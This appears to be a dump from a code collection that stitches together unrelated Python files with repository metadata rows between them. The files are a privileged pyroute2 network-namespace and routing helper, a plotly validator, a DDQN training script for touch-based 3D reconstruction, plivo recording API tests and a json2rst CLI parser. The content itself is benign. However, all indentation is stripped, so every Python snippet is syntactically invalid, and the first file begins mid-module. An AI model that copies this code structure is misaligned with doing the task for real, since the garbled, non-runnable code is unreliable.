def delete_interface(ifname, namespace, **kwargs):
_run_iproute_link("del", ifname, namespace, **kwargs)
@_sync
@privileged.default.entrypoint
def interface_exists(ifname, namespace):
try:
idx = get_link_id(ifname, namespace)
return bool(idx)
except NetworkInterfaceNotFound:
return False
except OSError as e:
if e.errno == errno.ENOENT:
return False
raise
@_sync
@privileged.default.entrypoint
def set_link_flags(device, namespace, flags):
link = _run_iproute_link("get", device, namespace)[0]
new_flags = flags | link['flags']
return _run_iproute_link("set", device, namespace, flags=new_flags)
@_sync
@privileged.default.entrypoint
def set_link_attribute(device, namespace, **attributes):
return _run_iproute_link("set", device, namespace, **attributes)
@_sync
@privileged.default.entrypoint
def get_link_attributes(device, namespace):
link = _run_iproute_link("get", device, namespace)[0]
return {
'mtu': link.get_attr('IFLA_MTU'),
'qlen': link.get_attr('IFLA_TXQLEN'),
'state': link.get_attr('IFLA_OPERSTATE'),
'qdisc': link.get_attr('IFLA_QDISC'),
'brd': link.get_attr('IFLA_BROADCAST'),
'link/ether': link.get_attr('IFLA_ADDRESS'),
'alias': link.get_attr('IFLA_IFALIAS'),
'allmulticast': bool(link['flags'] & ifinfmsg.IFF_ALLMULTI),
'link_kind': link.get_nested('IFLA_LINKINFO', 'IFLA_INFO_KIND')
}
@_sync
@privileged.default.entrypoint
def add_neigh_entry(ip_version, ip_address, mac_address, device, namespace,
**kwargs):
"""Add a neighbour entry.
:param ip_address: IP address of entry to add
:param mac_address: MAC address of entry to add
:param device: Device name to use in adding entry
:param namespace: The name of the namespace in which to add the entry
"""
family = _IP_VERSION_FAMILY_MAP[ip_version]
_run_iproute_neigh('replace',
device,
namespace,
dst=ip_address,
lladdr=mac_address,
family=family,
state=ndmsg.states['permanent'],
**kwargs)
@_sync
@privileged.default.entrypoint
def delete_neigh_entry(ip_version, ip_address, mac_address, device, namespace,
**kwargs):
"""Delete a neighbour entry.
:param ip_address: IP address of entry to delete
:param mac_address: MAC address of entry to delete
:param device: Device name to use in deleting entry
:param namespace: The name of the namespace in which to delete the entry
"""
family = _IP_VERSION_FAMILY_MAP[ip_version]
try:
_run_iproute_neigh('delete',
device,
namespace,
dst=ip_address,
lladdr=mac_address,
family=family,
**kwargs)
except NetlinkError as e:
# trying to delete a non-existent entry shouldn't raise an error
if e.code == errno.ENOENT:
return
raise
@_sync
@privileged.default.entrypoint
def dump_neigh_entries(ip_version, device, namespace, **kwargs):
"""Dump all neighbour entries.
:param ip_version: IP version of entries to show (4 or 6)
:param device: Device name to use in dumping entries
:param namespace: The name of the namespace in which to dump the entries
:param kwargs: Callers add any filters they use as kwargs
:return: a list of dictionaries, each representing a neighbour.
The dictionary format is: {'dst': ip_address,
'lladdr': mac_address,
'device': device_name}
"""
family = _IP_VERSION_FAMILY_MAP[ip_version]
entries = []
dump = _run_iproute_neigh('dump',
device,
namespace,
family=family,
**kwargs)
for entry in dump:
attrs = dict(entry['attrs'])
entries += [{'dst': attrs['NDA_DST'],
'lladdr': attrs.get('NDA_LLADDR'),
'device': device}]
return entries
@privileged.default.entrypoint
def create_netns(name, **kwargs):
"""Create a network namespace.
:param name: The name of the namespace to create
"""
try:
netns.create(name, **kwargs)
except OSError as e:
if e.errno != errno.EEXIST:
raise
@privileged.default.entrypoint
def remove_netns(name, **kwargs):
"""Remove a network namespace.
:param name: The name of the namespace to remove
"""
try:
netns.remove(name, **kwargs)
except OSError as e:
if e.errno != errno.ENOENT:
raise
@privileged.default.entrypoint
def list_netns(**kwargs):
"""List network namespaces.
Caller requires raised priveleges to list namespaces
"""
return netns.listnetns(**kwargs)
def make_serializable(value):
"""Make a pyroute2 object serializable
This function converts 'netlink.nla_slot' object (key, value) in a list
of two elements.
"""
def _ensure_string(value):
# NOTE(ralonsoh): once PY2 is deprecated, the str() conversion will be
# no needed and six.binary_type --> bytes.
return (str(value.decode('utf-8'))
if isinstance(value, six.binary_type) else value)
if isinstance(value, list):
return [make_serializable(item) for item in value]
elif isinstance(value, netlink.nla_slot):
return [value[0], make_serializable(value[1])]
elif isinstance(value, netlink.nla_base) and six.PY3:
return make_serializable(value.dump())
elif isinstance(value, dict):
return {_ensure_string(key): make_serializable(data)
for key, data in value.items()}
elif isinstance(value, tuple):
return tuple(make_serializable(item) for item in value)
return _ensure_string(value)
@_sync
@privileged.default.entrypoint
def get_link_devices(namespace, **kwargs):
"""List interfaces in a namespace
:return: (list) interfaces in a namespace
"""
try:
with get_iproute(namespace) as ip:
return make_serializable(ip.get_links(**kwargs))
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
def get_device_names(namespace, **kwargs):
"""List interface names in a namespace
:return: a list of strings with the names of the interfaces in a namespace
"""
devices_attrs = [link['attrs'] for link
in get_link_devices(namespace, **kwargs)]
device_names = []
for device_attrs in devices_attrs:
for link_name in (link_attr[1] for link_attr in device_attrs
if link_attr[0] == 'IFLA_IFNAME'):
device_names.append(link_name)
return device_names
@_sync
@privileged.default.entrypoint
def get_ip_addresses(namespace, **kwargs):
"""List of IP addresses in a namespace
:return: (tuple) IP addresses in a namespace
"""
try:
with get_iproute(namespace) as ip:
return make_serializable(ip.get_addr(**kwargs))
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def list_ip_rules(namespace, ip_version, match=None, **kwargs):
"""List all IP rules"""
try:
with get_iproute(namespace) as ip:
rules = make_serializable(ip.get_rules(
family=_IP_VERSION_FAMILY_MAP[ip_version],
match=match, **kwargs))
for rule in rules:
rule['attrs'] = {
key: value for key, value
in ((item[0], item[1]) for item in rule['attrs'])}
return rules
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def add_ip_rule(namespace, **kwargs):
"""Add a new IP rule"""
try:
with get_iproute(namespace) as ip:
ip.rule('add', **kwargs)
except netlink_exceptions.NetlinkError as e:
if e.code == errno.EEXIST:
return
raise
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def delete_ip_rule(namespace, **kwargs):
"""Delete an IP rule"""
try:
with get_iproute(namespace) as ip:
ip.rule('del', **kwargs)
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
def _make_pyroute2_route_args(namespace, ip_version, cidr, device, via, table,
metric, scope, protocol):
"""Returns a dictionary of arguments to be used in pyroute route commands
:param namespace: (string) name of the namespace
:param ip_version: (int) [4, 6]
:param cidr: (string) source IP or CIDR address (IPv4, IPv6)
:param device: (string) input interface name
:param via: (string) gateway IP address
:param table: (string, int) table number or name
:param metric: (int) route metric
:param scope: (int) route scope
:param protocol: (string) protocol name (pyroute2.netlink.rtnl.rt_proto)
:return: a dictionary with the kwargs needed in pyroute rule commands
"""
args = {'family': _IP_VERSION_FAMILY_MAP[ip_version]}
if not scope:
scope = 'global' if via else 'link'
scope = _get_scope_name(scope)
if scope:
args['scope'] = scope
if cidr:
args['dst'] = cidr
if device:
args['oif'] = get_link_id(device, namespace)
if via:
args['gateway'] = via
if table:
args['table'] = int(table)
if metric:
args['priority'] = int(metric)
if protocol:
args['proto'] = protocol
return args
@_sync
@privileged.default.entrypoint
def add_ip_route(namespace, cidr, ip_version, device=None, via=None,
table=None, metric=None, scope=None, **kwargs):
"""Add an IP route"""
kwargs.update(_make_pyroute2_route_args(
namespace, ip_version, cidr, device, via, table, metric, scope,
'static'))
try:
with get_iproute(namespace) as ip:
ip.route('replace', **kwargs)
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def list_ip_routes(namespace, ip_version, device=None, table=None, **kwargs):
"""List IP routes"""
kwargs.update(_make_pyroute2_route_args(
namespace, ip_version, None, device, None, table, None, None, None))
try:
with get_iproute(namespace) as ip:
return make_serializable(ip.route('show', **kwargs))
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def delete_ip_route(namespace, cidr, ip_version, device=None, via=None,
table=None, scope=None, **kwargs):
"""Delete an IP route"""
kwargs.update(_make_pyroute2_route_args(
namespace, ip_version, cidr, device, via, table, None, scope, None))
try:
with get_iproute(namespace) as ip:
ip.route('del', **kwargs)
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
| 33.948649
| 79
| 0.638405
|
9f89fc5e16180695eccef0483180176338191822
| 526
|
py
|
Python
|
plotly/validators/histogram2d/colorbar/_showexponent.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | 2
|
2020-03-24T11:41:14.000Z
|
2021-01-14T07:59:43.000Z
|
plotly/validators/histogram2d/colorbar/_showexponent.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | null | null | null |
plotly/validators/histogram2d/colorbar/_showexponent.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | 4
|
2019-06-03T14:49:12.000Z
|
2022-01-06T01:05:12.000Z
|
import _plotly_utils.basevalidators
class ShowexponentValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self,
plotly_name='showexponent',
parent_name='histogram2d.colorbar',
**kwargs
):
super(ShowexponentValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='colorbars',
role='style',
values=['all', 'first', 'last', 'none'],
**kwargs
)
| 26.3
| 78
| 0.60076
|
2a5cdb47300e78039ff43dddd59df2d712c72610
| 18,528
|
py
|
Python
|
pterotactyl/policies/DDQN/train.py
|
maurock/Active-3D-Vision-and-Touch
|
39e24de0ad3c3caad5d78b7cb351e95d4691c88c
|
[
"MIT"
] | 10
|
2021-10-29T18:04:03.000Z
|
2022-03-22T11:42:13.000Z
|
pterotactyl/policies/DDQN/train.py
|
maurock/Active-3D-Vision-and-Touch
|
39e24de0ad3c3caad5d78b7cb351e95d4691c88c
|
[
"MIT"
] | null | null | null |
pterotactyl/policies/DDQN/train.py
|
maurock/Active-3D-Vision-and-Touch
|
39e24de0ad3c3caad5d78b7cb351e95d4691c88c
|
[
"MIT"
] | 3
|
2021-11-05T16:45:27.000Z
|
2021-12-22T12:53:06.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
from torch.utils.tensorboard import SummaryWriter
from torch.utils.data import DataLoader
import torch
import argparse
from submitit.helpers import Checkpointable
from tqdm import tqdm
from pterotactyl.policies.DDQN import ddqn
from pterotactyl.policies import environment
from pterotactyl.policies import replay
from pterotactyl.utility import utils
from pterotactyl import pretrained
# module for training the DDQN models
class Engine(Checkpointable):
def __init__(self, args):
self.args = args
self.steps = 0
self.episode = 0
self.epoch = 0
self.cur_loss = 10000
self.best_loss = 10000
self.epsilon = self.args.epsilon_start
self.results_dir = os.path.join("results", args.exp_type, args.exp_id)
if not os.path.exists(self.results_dir):
os.makedirs(self.results_dir)
self.checkpoint_dir = os.path.join(
"experiments/checkpoint/", self.args.exp_type, self.args.exp_id
)
if not os.path.exists((self.checkpoint_dir)):
os.makedirs(self.checkpoint_dir)
utils.save_config(self.checkpoint_dir, args)
def __call__(self):
# initialize the learning environment
self.env = environment.ActiveTouch(self.args)
self.replay_memory = replay.ReplayMemory(self.args)
self.policy = ddqn.DDQN(self.args, self.env.mesh_info, self.replay_memory)
self.target_net = ddqn.DDQN(self.args, self.env.mesh_info, None)
self.target_net.load_state_dict(self.policy.state_dict())
self.target_net.eval()
self.writer = SummaryWriter(
os.path.join("experiments/tensorboard/", self.args.exp_type)
)
self.window_size = 1000
self.ave_reward = torch.zeros((self.window_size)).cuda()
self.ave_recon = torch.zeros((self.window_size)).cuda()
train_loader, valid_loaders = self.get_loaders()
if self.args.eval:
self.load(best=True)
self.validate(valid_loaders)
return
self.resume()
# training loop
for epoch in range(self.epoch, self.args.epochs):
self.train(train_loader)
self.env.reset_pybullet()
if self.steps >= self.args.burn_in:
with torch.no_grad():
self.validate(valid_loaders)
self.env.reset_pybullet()
self.check_values_and_save()
self.epoch += 1
# load the environment data into pytorch dataloaders
def get_loaders(self):
if self.args.eval:
train_loader = ""
else:
train_loader = DataLoader(
self.env.train_data,
batch_size=self.args.env_batch_size,
shuffle=True,
num_workers=4,
collate_fn=self.env.train_data.collate,
)
valid_loader = DataLoader(
self.env.valid_data,
batch_size=self.args.env_batch_size,
shuffle=False,
num_workers=4,
collate_fn=self.env.valid_data.collate,
)
return train_loader, valid_loader
# training iteration
def train(self, dataloader):
for v, batch in enumerate(tqdm(dataloader, total=self.args.train_steps)):
if v > self.args.train_steps - 1:
break
obs = self.env.reset(batch)
all_done = False
total_reward = 0
while not all_done:
# update epsilon
if self.steps >= self.args.burn_in:
self.epsilon = self.policy.update_epsilon(self.epsilon, self.args)
# get action
get_random_action = self.steps < self.args.burn_in
action = self.policy.get_action(
obs, eps_threshold=self.epsilon, give_random=get_random_action
)
# perform action
with torch.no_grad():
next_obs, reward, all_done = self.env.step(action)
# save experiance
self.policy.add_experience(action, obs, next_obs, reward)
# update policy
if self.steps >= self.args.burn_in:
self.policy.update_parameters(self.target_net)
# update target network
if (
self.steps % self.args.target_update == 0
and self.steps >= self.args.burn_in
):
print("+" * 5 + " updating target " "+" * 5)
self.target_net.load_state_dict(self.policy.state_dict())
torch.cuda.empty_cache()
obs = next_obs
self.steps += 1
# logs
recon = float((obs["score"] / obs["first_score"]).mean().item())
reward = float(
((obs["first_score"] - obs["score"]) / obs["first_score"]).mean().item()
)
self.ave_reward[self.episode % self.window_size] = reward
self.ave_recon[self.episode % self.window_size] = float(
(obs["score"] / obs["first_score"]).mean().item()
)
ave_reward = self.ave_reward[: self.episode + 1].mean()
ave_recon = self.ave_recon[: self.episode + 1].mean()
message = (
f"T Epoch: {self.epoch} Ep: {self.episode}, recon: {recon:.2f}, "
f"reward: {reward:.2f}, a_recon: {ave_recon:.2f}, a_reward: {ave_reward:.2f}, "
f" eps: {self.epsilon:.3f}, best: {self.best_loss:.3f}"
)
tqdm.write(message)
self.episode += 1
# logs
if self.steps >= self.args.burn_in:
self.writer.add_scalars(
"train_recon_|_", {self.args.exp_id: ave_recon}, self.steps
)
self.writer.add_scalars(
"train_reward_|_", {self.args.exp_id: ave_reward}, self.steps
)
# validation iteration
def validate(self, dataloader):
observations = []
scores = []
actions = []
names = []
print("*" * 30)
print("Doing Validation")
total = self.args.train_steps if not self.args.eval else None
for v, batch in enumerate(tqdm(dataloader, total=total)):
names += batch["names"]
if v > self.args.valid_steps - 1 and not self.args.eval:
break
obs = self.env.reset(batch)
all_done = False
cur_scores = [obs["score"]]
cur_actions = []
while not all_done:
# select actions
action = self.policy.get_action(
obs, eps_threshold=-1, give_random=False
)
# perform actions
with torch.no_grad():
next_obs, reward, all_done = self.env.step(action)
# record actions
torch.cuda.empty_cache()
obs = next_obs
cur_scores.append(obs["score"])
cur_actions.append(torch.FloatTensor(action))
observations.append(obs["mesh"])
scores.append(torch.stack(cur_scores).permute(1, 0))
actions.append(torch.stack(cur_actions).permute(1, 0))
print_score = (scores[-1][:, -1] / scores[-1][:, 0]).mean()
print_reward = (
(scores[-1][:, 0] - scores[-1][:, -1]) / scores[-1][:, 0]
).mean()
message = f"Valid || E: {self.epoch}, score: {print_score:.2f}, best score: {self.best_loss:.2f} "
message += f"reward = {print_reward:.2f}"
tqdm.write(message)
if self.args.visualize and v == 5 and self.args.eval:
meshes = torch.cat(observations, dim=0)[:, :, :3]
utils.visualize_prediction(
self.results_dir, meshes, self.env.mesh_info["faces"], names
)
self.env.reset_pybullet()
scores = torch.cat(scores)
actions = torch.cat(actions)
rewards = ((scores[:, 0] - scores[:, -1]) / scores[:, 0]).mean()
variation = torch.std(actions, dim=0).mean()
self.current_loss = (scores[:, -1] / scores[:, 0]).mean()
print("*" * 30)
message = f"Total Valid || E: {self.epoch}, score: {self.current_loss:.4f}, best score: {self.best_loss:.4f} "
message += f"reward = {rewards.mean():.2f}"
tqdm.write("*" * len(message))
tqdm.write(message)
tqdm.write("*" * len(message))
if not self.args.eval:
self.writer.add_scalars(
f"Valid_recon_|_", {self.args.exp_id: self.current_loss}, self.steps
)
self.writer.add_scalars(
f"Valid_reward_|_", {self.args.exp_id: rewards.mean()}, self.steps
)
self.writer.add_scalars(
"epsilon_|_", {self.args.exp_id: self.epsilon}, self.steps
)
self.writer.add_scalars(
f"Valid_variation_|_", {self.args.exp_id: variation}, self.steps
)
if self.args.visualize and self.args.eval:
utils.visualize_actions(self.results_dir, actions, self.args)
# check if the new validation score if better and save checkpoint
def check_values_and_save(self):
if self.best_loss >= self.current_loss:
improvement = self.best_loss - self.current_loss
print(
f"Saving with {improvement:.3f} improvement in Chamfer Distance on Validation Set "
)
self.best_loss = self.current_loss
self.save(best=True)
print(f"Saving DQN checkpoint")
self.save(best=False)
print("Saving replay memory.")
self.replay_memory.save(self.checkpoint_dir)
# resume training
def resume(self):
path = self.checkpoint_dir + "/recent"
if os.path.exists(path + "_model"):
print(f"Loading DQN checkpoint")
self.load(best=False)
print("Loading replay memory.")
self.replay_memory.load(path)
# save current state of training
def save(self, best=False):
if best:
path = self.checkpoint_dir + "/best"
else:
path = self.checkpoint_dir + "/recent"
self.replay_memory.save(path)
torch.save(
{
"dqn_weights": self.policy.state_dict(),
"target_weights": self.target_net.state_dict(),
"args": self.args,
"episode": self.episode,
"steps": self.steps,
"ave_reward": self.ave_reward,
"ave_recon": self.ave_recon,
"epsilon": self.epsilon,
"epoch": self.epoch,
},
path + "_model",
)
# load previous state of training
def load(self, best=True):
if self.args.pretrained:
prefix = "l" if self.args.use_latent else "g"
if self.args.use_img:
if self.args.finger:
path = (
os.path.dirname(pretrained.__file__)
+ f"/policies/DDQN/{prefix}_v_t_p"
)
else:
path = (
os.path.dirname(pretrained.__file__)
+ f"/policies/DDQN/{prefix}_v_t_g"
)
else:
if self.args.finger:
path = (
os.path.dirname(pretrained.__file__)
+ f"/policies/DDQN/{prefix}_t_p"
)
else:
path = (
os.path.dirname(pretrained.__file__)
+ f"/policies/DDQN/{prefix}_t_g"
)
checkpoint = torch.load(path)
self.policy.load_state_dict(checkpoint["dqn_weights"])
else:
if best:
path = self.checkpoint_dir + "/best_model"
else:
path = self.checkpoint_dir + "/recent_model"
checkpoint = torch.load(path)
self.policy.load_state_dict(checkpoint["dqn_weights"])
self.episode = checkpoint["episode"] + 1
if not self.args.eval:
self.target_net.load_state_dict(checkpoint["target_weights"])
self.steps = checkpoint["steps"]
self.ave_reward = checkpoint["ave_reward"]
self.ave_recon = checkpoint["ave_recon"]
self.epsilon = checkpoint["epsilon"]
self.epoch = checkpoint["epoch"] + 1
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--cut",
type=float,
default=0.33,
help="The shared size of features in the GCN.",
)
parser.add_argument(
"--layers", type=int, default=4, help="Number of layers in the q network"
)
parser.add_argument(
"--hidden_dim",
type=int,
default=200,
help="hidden dimension size in layers in the q network",
)
parser.add_argument(
"--epochs", type=int, default=1000, help="Number of epochs to use."
)
parser.add_argument(
"--limit_data",
action="store_true",
default=False,
help="use less data, for debugging.",
)
parser.add_argument(
"--finger", action="store_true", default=False, help="use only one finger."
)
parser.add_argument(
"--eval",
action="store_true",
default=False,
help="Evaluate the trained model on the test set.",
)
parser.add_argument(
"--touch_location",
type=str,
default=os.path.dirname(pretrained.__file__) + "/reconstruction/touch/best/",
help="the location of the touch part prediction.",
)
parser.add_argument(
"--vision_location",
type=str,
default=os.path.dirname(pretrained.__file__) + "/reconstruction/vision/t_p/",
help="the location of the touch part prediction.",
)
parser.add_argument(
"--auto_location",
type=str,
default=os.path.dirname(pretrained.__file__) + "/reconstruction/auto/t_p/",
help="the location of the autoencoder part prediction.",
)
parser.add_argument(
"--number_points",
type=int,
default=30000,
help="number of points sampled for the chamfer distance.",
)
parser.add_argument(
"--seed", type=int, default=0, help="Setting for the random seed."
)
parser.add_argument(
"--lr", type=float, default=0.0003, help="Initial learning rate."
)
parser.add_argument(
"--env_batch_size",
type=int,
default=3,
help="Size of the batch of objects sampled from the environment",
)
parser.add_argument(
"--train_batch_size",
type=int,
default=16,
help="Size of the batch of transitions sampled for training the q network.",
)
parser.add_argument(
"--exp_id", type=str, default="test", help="The experiment name."
)
parser.add_argument(
"--exp_type", type=str, default="test", help="The experiment group."
)
parser.add_argument(
"--use_img", action="store_true", default=False, help="To use the image."
)
parser.add_argument(
"--patience",
type=int,
default=70,
help="How many epochs without imporvement before training stops.",
)
parser.add_argument(
"--loss_coeff", type=float, default=9000.0, help="Coefficient for loss term."
)
parser.add_argument(
"--num_grasps", type=int, default=5, help="Number of grasps to train with. "
)
parser.add_argument("--budget", type=int, default=5)
parser.add_argument(
"--normalization",
type=str,
choices=["first", "current", "none"],
default="first",
help="how to normalize the reward for the q network update ",
)
parser.add_argument(
"--mem_capacity", type=int, default=300, help="the size of the replay buffer"
)
parser.add_argument("--burn_in", type=int, default=20, help="ddqn burn in time")
parser.add_argument(
"--num_actions", type=int, default=50, help=" number of possible actions"
)
parser.add_argument("--gamma", type=float, default=0, help="ddqn gamma value")
parser.add_argument(
"--epsilon_start", type=float, default=1.0, help="ddqn initial epsilon value"
)
parser.add_argument(
"--epsilon_decay", type=float, default=0.9999, help="ddqn epsilon decay value"
)
parser.add_argument(
"--epsilon_end", type=float, default=0.01, help="ddqn minimum epsilon value"
)
parser.add_argument(
"--train_steps",
type=int,
default=20,
help="number of training iterations per epoch",
)
parser.add_argument(
"--valid_steps",
type=int,
default=10,
help="number of validation iterations per epoch",
)
parser.add_argument(
"--target_update",
type=int,
default=3000,
help="frequency of target network updates",
)
parser.add_argument(
"--use_latent",
action="store_true",
default=False,
help="if the latent embedding of objects is to be used",
)
parser.add_argument(
"--use_recon",
action="store_true",
default=False,
help="if the object prediction is to be directly used",
)
parser.add_argument(
"--visualize",
action="store_true",
default=False,
help="visualize predictions and actions while evaluating",
)
parser.add_argument(
"--pretrained_recon",
action="store_true",
default=False,
help="use the pretrained reconstruction models to train",
)
parser.add_argument(
"--pretrained",
action="store_true",
default=False,
help="use the pretrained policy",
)
args = parser.parse_args()
trainer = Engine(args)
trainer()
| 35.090909
| 118
| 0.559046
|
16af61e638573807c8563c7163fbde1370bb1cab
| 5,540
|
py
|
Python
|
tests/resources/test_recordings.py
|
burhanahmed-plivo/plivo-python
|
61f86f20efb2bdd30a9ae40ed837c20af42f20b9
|
[
"MIT"
] | null | null | null |
tests/resources/test_recordings.py
|
burhanahmed-plivo/plivo-python
|
61f86f20efb2bdd30a9ae40ed837c20af42f20b9
|
[
"MIT"
] | null | null | null |
tests/resources/test_recordings.py
|
burhanahmed-plivo/plivo-python
|
61f86f20efb2bdd30a9ae40ed837c20af42f20b9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from datetime import datetime
import plivo
from tests.base import PlivoResourceTestCase
from tests.decorators import with_response
class RecordingTest(PlivoResourceTestCase):
@with_response(200)
def test_list(self):
recordings = self.client.recordings.list(
add_time__gt=datetime(2017, 4, 15, 1, 1, 1),
add_time__gte=datetime(2017, 4, 15, 1, 1, 1),
add_time__lt=datetime(2017, 4, 15, 1, 1, 1),
add_time__lte=datetime(2017, 4, 15, 1, 1, 1, 123))
# Test if ListResponseObject's __iter__ is working correctly
self.assertEqual(len(list(recordings)), 3)
# Verifying the endpoint hit
self.assertUrlEqual(
'https://voice.plivo.com/v1/Account/MAXXXXXXXXXXXXXXXXXX/Recording/?add_time__gt=2017-04-15+01%3A01%3A01&add_time__lt=2017-04-15+01%3A01%3A01&add_time__gte=2017-04-15+01%3A01%3A01&add_time__lte=2017-04-15+01%3A01%3A01.000123&limit=20&offset=0',
self.client.current_request.url)
# Verifying the method used
self.assertEqual('GET', self.client.current_request.method)
# Verifying if the Account specific changes and parsing happened
self.assertEqual('fc2716b0-1c8b-11e4-bwad-842b2b17453e',
recordings.objects[1].id)
with self.assertRaises(plivo.exceptions.ValidationError):
recordings = self.client.recordings.list(limit=100)
def test_recording_list_by_subaccount(self):
expected_response = {
'account':
'/v1/Account/MANWVLYTK4ZWU1YTY4ZT/',
'api_id':
'323972b2-0db3-11e4-a2d1-22000ac5040c',
'auth_id':
'SAXXXXXXXXXXXXXXXXXX',
'auth_token':
'MTZjYWM0YzVjNjMwZmVmODFiNWJjNWJmOGJjZjgw',
'created':
'2014-07-17',
'enabled':
False,
'modified':
None,
'name':
'Chewbacca',
'resource_uri':
'/v1/Account/MANWVLYTK4ZWU1YTY4ZT/Subaccount/SAMTVIYJDIYWYYMZHLYZ/'
}
self.client.set_expected_response(
status_code=200, data_to_return=expected_response)
account_details = self.client.subaccounts.get('SA' + 'X' * 18)
expected_response = {
'api_id': 'ff25223a-1c9f-11e4-80aa-12313f048015',
'meta': {
'limit':
3,
'next':
'/v1/Account/MANWVLYTK4ZWU1YTY4ZT/Recording/?limit=3&offset=3',
'offset':
0,
'previous':
None,
'total_count':
948
},
'objects': []
}
self.client.set_expected_response(
status_code=200, data_to_return=expected_response)
with self.assertRaises(plivo.exceptions.ValidationError):
recordings = self.client.recordings.list(
subaccount='SA' + 'X' * 17)
recordings = self.client.recordings.list(
subaccount='SA' + 'X' * 18, call_uuid='SomeCallUUID')
# Verifying the endpoint hit
self.assertUrlEqual(
'https://voice.plivo.com/v1/Account/MAXXXXXXXXXXXXXXXXXX/Recording/?call_uuid=SomeCallUUID&limit=20&subaccount=SAXXXXXXXXXXXXXXXXXX&offset=0',
self.client.current_request.url)
# Verifying the method used
self.assertEqual('GET', self.client.current_request.method)
with self.assertRaises(plivo.exceptions.ValidationError):
recordings = self.client.recordings.list(limit=100)
recordings = self.client.recordings.list(
subaccount=account_details, call_uuid='SomeCallUUID')
# Verifying the endpoint hit
self.assertUrlEqual(
'https://voice.plivo.com/v1/Account/MAXXXXXXXXXXXXXXXXXX/Recording/?call_uuid=SomeCallUUID&limit=20&subaccount=SAXXXXXXXXXXXXXXXXXX&offset=0',
self.client.current_request.url)
# Verifying the method used
self.assertEqual('GET', self.client.current_request.method)
@with_response(200)
def test_get(self):
recording = self.client.recordings.get(
'c2186400-1c8c-11e4-a664-0026b945b52x')
self.assertResponseMatches(recording)
# Verifying the endpoint hit
self.assertEqual(
'https://voice.plivo.com/v1/Account/MAXXXXXXXXXXXXXXXXXX/Recording/c2186400-1c8c-11e4-a664-0026b945b52x/',
self.client.current_request.url)
# Verifying the method used
self.assertEqual('GET', self.client.current_request.method)
# Verifying the object type returned
self.assertEqual(plivo.resources.recordings.Recording,
recording.__class__)
# Verifying if the Account specific changes and parsing happened
self.assertEqual('c2186400-1c8c-11e4-a664-0026b945b52x', recording.id)
self.assertEqual('345100.00000', recording.recording_duration_ms)
@with_response(204)
def test_delete(self):
response = self.client.recordings.delete(
'c2186400-1c8c-11e4-a664-0026b945b52x')
# Verifying the endpoint hit
self.assertEqual(
'https://voice.plivo.com/v1/Account/MAXXXXXXXXXXXXXXXXXX/Recording/c2186400-1c8c-11e4-a664-0026b945b52x/',
self.client.current_request.url)
# Verifying the method used
self.assertEqual('DELETE', self.client.current_request.method)
| 36.688742
| 256
| 0.629242
|
d25189e4bf5ced157698f78e6dc7aebe1ee3455f
| 3,790
|
py
|
Python
|
json2rst/cmd.py
|
zed-eiq/bad-json-to-rst-tables
|
e9f022f68e1ea292370261c9b0c9116915802438
|
[
"Apache-2.0"
] | null | null | null |
json2rst/cmd.py
|
zed-eiq/bad-json-to-rst-tables
|
e9f022f68e1ea292370261c9b0c9116915802438
|
[
"Apache-2.0"
] | null | null | null |
json2rst/cmd.py
|
zed-eiq/bad-json-to-rst-tables
|
e9f022f68e1ea292370261c9b0c9116915802438
|
[
"Apache-2.0"
] | 1
|
2021-03-24T14:38:50.000Z
|
2021-03-24T14:38:50.000Z
|
import argparse
import logging
from pathlib import Path
from typing import Tuple, Set
from . import utils
from .pivot import Pivot
logging.basicConfig(level=logging.DEBUG)
def _cli() -> any:
"""
CLI helper.
Returns:
a argparse.Namespace object, that looks very much like a NamedTuple
"""
parser = argparse.ArgumentParser()
cmd_rst = parser.add_argument_group("General options")
cmd_rst.add_argument(
"--input",
dest="infiles",
required=True,
help="Input JSON file, or a directory containing JSON files.")
cmd_rst.add_argument(
"--output",
dest="outdir",
default=".",
help="Output directory. Defaults to current directory.")
cmd_pivot = parser.add_argument_group("Pivot a directory of JSON files.")
cmd_pivot.add_argument(
"pivot",
type=bool,
nargs="?",
default=False,
help="""Specify 'pivot' to pivot JSON files.
Collects JSON files from --input,and
extract values from fields that match names in --header,
and write to a csv-table.
"""
)
cmd_pivot.add_argument(
"--headers",
dest="pivot_headers",
type=str,
required=False,
help="""Required for pivot.
Add a list of header names as comma-separated values.
JSON files from --input will be pivoted against this list.
Headers MUST BE UNIQUE (RFC8259 §4). Duplicate headers are discarded.
E.g.: --headers='key1,key2,key3'
"""
)
cmd_pivot.add_argument(
"--strict",
action="store_true",
required=False,
help="""Strict mode for pivot.
When set, JSON files must have all fields specified with --headers.
"""
)
cmd_pivot.add_argument(
"--sort-by",
dest="sort_by",
type=str,
required=False,
help="""Sort the pivot table by a given key.
Specify only one key.
"""
)
cmd_pivot.add_argument(
"--sort-order",
dest="sort_order",
type=str,
required=False,
help="""Sort --sort-by in 'ascending' or 'descending' order."""
)
cmd_pivot.add_argument(
"--csv-out",
dest="csv_out",
type=str,
required=False,
help="Name of output CSV file saved in --output dir."
)
return parser.parse_args()
